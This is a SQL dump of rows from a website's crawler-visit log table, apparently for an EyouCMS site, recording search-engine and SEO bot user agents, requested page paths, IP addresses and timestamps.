INSERT INTO `ey_weapp_spider_visit` VALUES ('94449', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_13', '114.119.151.153', '1660285501', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94446', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.205', '1660281326', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96983', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/blj/', '185.191.171.23', '1661541010', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96981', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/gys.html', '114.119.151.155', '1661540539', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96977', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/96.html', '220.181.108.94', '1661539435', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97042', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/111.html', '114.119.151.153', '1661565807', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96957', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/56.html', '185.191.171.26', '1661527784', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96956', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.80', '1661526691', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96959', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/119.html', '185.191.171.4', '1661529760', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98802', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/gqal', '116.179.32.18', '1662351713', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94447', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/469.html', '185.191.171.42', '1660282844', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94448', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.112', '1660285465', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98893', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/211.html', '114.119.151.153', '1662415390', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97193', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/43.html', '116.179.32.28', '1661624285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96950', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/170.html', '185.191.171.37', '1661521616', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96951', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/28.html', '220.181.108.156', '1661523070', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96938', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/108.html', '185.191.171.40', '1661510026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96940', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/31_8.html', '220.181.108.84', '1661511615', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96942', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/226.html', '216.244.66.194', '1661513795', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96936', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/20.html', '66.249.79.110', '1661509321', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96937', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/488.html', '220.181.108.178', '1661509983', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96945', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/87.html', '116.179.32.174', '1661516525', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96970', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/index.php', '114.119.151.155', '1661536554', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96928', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lh.html', '114.119.151.153', '1661508042', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96927', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xt.html', '114.119.151.155', '1661507457', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97215', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ccs.html', '114.119.151.153', '1661637017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96939', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/342.html', '185.191.171.33', '1661510217', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96906', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.146', '1661503030', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96903', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_24/', '66.249.79.112', '1661501550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94332', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1660208548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96907', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_4/', '185.191.171.19', '1661503129', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96908', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661503661', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98895', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wa.html', '114.119.151.155', '1662415588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98910', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/165.html', '220.181.108.175', '1662427776', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98896', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/340.html', '114.119.151.155', '1662415711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97216', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/137.html', '114.119.151.155', '1661637324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96899', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.37', '1661500694', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96905', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.83', '1661502115', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94330', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wuwei.html', '114.119.151.153', '1660207982', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94331', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.119', '1660208439', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98909', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '23.231.76.242', '1662426709', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98899', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/419.html', '207.46.13.144', '1662416384', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96917', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/289.html', '66.249.79.110', '1661505268', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96916', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/syss.html', '114.119.151.153', '1661505212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98908', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '23.231.76.242', '1662426708', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96896', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/157.html', '185.191.171.43', '1661500133', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96895', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.108', '1661497868', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96894', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/166.html', '116.179.32.115', '1661496756', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96919', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/429.html', '220.181.108.111', '1661505788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98911', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/165.html', '185.191.171.10', '1662428625', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96897', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/123.html', '185.191.171.13', '1661500601', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96898', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/', '116.179.32.43', '1661500644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96910', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.177', '1661503950', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96911', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xhq.html', '114.119.151.155', '1661504483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96891', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/202.html', '185.191.171.5', '1661495125', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96893', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/462.html', '66.249.79.112', '1661496710', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96913', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/53.html', '216.244.66.194', '1661504577', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96880', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/69.html', '114.119.151.153', '1661489214', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98915', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1662429904', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96863', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/44_4.html', '66.249.79.108', '1661474131', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96866', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/258.html', '66.249.79.110', '1661474956', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96879', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/345.html', '114.119.151.155', '1661488308', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97013', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661554806', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97023', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/wh.html', '114.119.151.155', '1661558662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97048', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/318.html', '185.191.171.7', '1661567765', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97010', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/462.html', '216.244.66.194', '1661554402', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97005', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_2.html', '185.191.171.37', '1661553395', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97000', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661551120', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96996', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661547338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96872', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1661483666', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98918', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1662431970', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96953', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/484.html', '185.191.171.22', '1661524923', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96954', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/173.html', '116.179.32.114', '1661526343', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96960', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/140.html', '185.191.171.3', '1661529869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98917', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/', '185.191.171.8', '1662431489', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96952', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/393.html', '185.191.171.35', '1661523348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96948', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/33.html', '116.179.32.51', '1661519798', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96955', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '27.158.148.140', '1661526383', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96947', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.135', '1661519793', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96946', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661518528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96969', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/296.html', '185.191.171.5', '1661535921', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96980', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/139.html', '185.191.171.3', '1661540465', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97198', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tb', '220.181.108.145', '1661626957', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96943', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_4.html', '185.191.171.44', '1661515022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96941', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/245.html', '185.191.171.1', '1661512613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96949', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_6.html', '185.191.171.10', '1661520069', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96963', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/5_5.html', '185.191.171.35', '1661533552', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96982', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_20.html', '185.191.171.5', '1661540998', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96967', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_6/', '114.119.151.153', '1661535208', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96944', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/305.html', '114.119.151.153', '1661515699', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97205', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/70_2.html', '185.191.171.42', '1661630974', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96890', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '103.43.70.250', '1661494319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96900', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/90.html', '216.244.66.194', '1661501179', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96838', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/134.html', '114.119.151.153', '1661464905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96848', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/47.html?tagid=47', '185.191.171.4', '1661468946', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96854', '99', 'mozilla/5.0 (compatible;petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/', '114.119.151.153', '1661470534', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96847', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xts.html', '114.119.151.155', '1661468017', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96845', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_5.html', '185.191.171.23', '1661467827', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96809', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/450.html', '17.121.112.119', '1661453820', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96812', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/192.html', '185.191.171.10', '1661454579', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96822', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/73_5.html', '185.191.171.26', '1661459329', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97285', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/467.html', '66.249.79.110', '1661662229', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97289', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/98.html', '185.191.171.12', '1661662894', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96790', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/list_2_2/', '162.55.86.60', '1661444728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96783', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/494.html', '162.55.86.60', '1661444666', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96774', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/450.html', '162.55.86.60', '1661444582', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97295', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/pxs.html', '114.119.151.153', '1661663831', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96884', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/227.html', '216.244.66.194', '1661491150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96763', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/257.html', '162.55.86.60', '1661444484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96902', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/498.html', '116.179.32.144', '1661501193', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96904', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/90.html', '116.179.32.18', '1661502111', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97260', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.53', '1661653030', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96901', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/25_6.html', '116.179.32.19', '1661501192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97323', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/375.html', '114.119.151.155', '1661671387', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97334', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/162.html', '220.181.108.93', '1661677747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96789', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/products/267.html', '162.55.86.60', '1661444723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96912', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/89.html', '216.244.66.194', '1661504499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97333', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.110', '1661677348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96775', '99', 'mozilla/5.0 (compatible; blexbot/1.0; +http://webmeup-crawler.com/)', '/news/452.html', '162.55.86.60', '1661444591', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97258', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/245.html', '66.249.79.110', '1661652388', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96858', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/196.html', '114.119.151.153', '1661471031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97017', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/buliaojial/', '114.119.151.153', '1661556900', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97016', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/182.html', '66.249.79.112', '1661556189', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97052', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/10_3.html', '185.191.171.4', '1661569078', '0');
